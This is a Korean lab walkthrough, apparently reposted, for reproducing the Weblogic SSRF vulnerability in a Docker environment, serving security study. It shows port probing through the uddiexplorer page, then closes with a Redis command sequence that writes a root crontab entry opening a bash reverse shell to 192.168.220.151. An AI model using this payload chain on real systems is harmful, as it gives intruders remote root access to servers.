찾다

>운영 및 유지보수 >안전 >Weblogic SSRF 취약점을 재현하는 방법

Weblogic SSRF 취약점을 재현하는 방법

王林
王林앞으로
2023-05-14 20:04:041436검색

1. Docker를 사용하여 환경 구축

Docker 설치 및 환경 구축 튜토리얼: https://www.freebuf.com/sectool/252257.html

如何实现Weblogic SSRF漏洞复现

액세스 포트 7001如何实现Weblogic SSRF漏洞复现

2.

1. 페이지/uddiexplorer/SearchPublicRegistries.jsp

如何实现Weblogic SSRF漏洞复现

2에 취약점이 존재합니다. 2. IBM 사이트를 확인하여

如何实现Weblogic SSRF漏洞复现

연결인지 확인하세요. 이는 SSRF가 존재할 수 있음을 의미합니다

3. Burp Suite를 사용하여 패킷 캡처

如何实现Weblogic SSRF漏洞复现

4. 연산자 매개변수 연결 수정如何实现Weblogic SSRF漏洞复现

5. 존재하지 않는 포트에 대한 액세스는 HTTP如何实现Weblogic SSRF漏洞复现

를 통해 연결할 수 없습니다.

기존 포트에 액세스하면 상태 코드가 반환됩니다.

如何实现Weblogic SSRF漏洞复现

인트라넷에 액세스

如何实现Weblogic SSRF漏洞复现

redis를 사용하여 셸 페이로드를 리바운드하세요

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

위 내용은 Weblogic SSRF 취약점을 재현하는 방법의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

성명:
이 기사는 yisu.com에서 복제됩니다. 침해가 있는 경우 admin@php.cn으로 문의하시기 바랍니다. 삭제
이전 기사:Javascript에서 map() 없이 매핑된 배열을 구현하는 방법다음 기사:Javascript에서 map() 없이 매핑된 배열을 구현하는 방법

관련 기사

더보기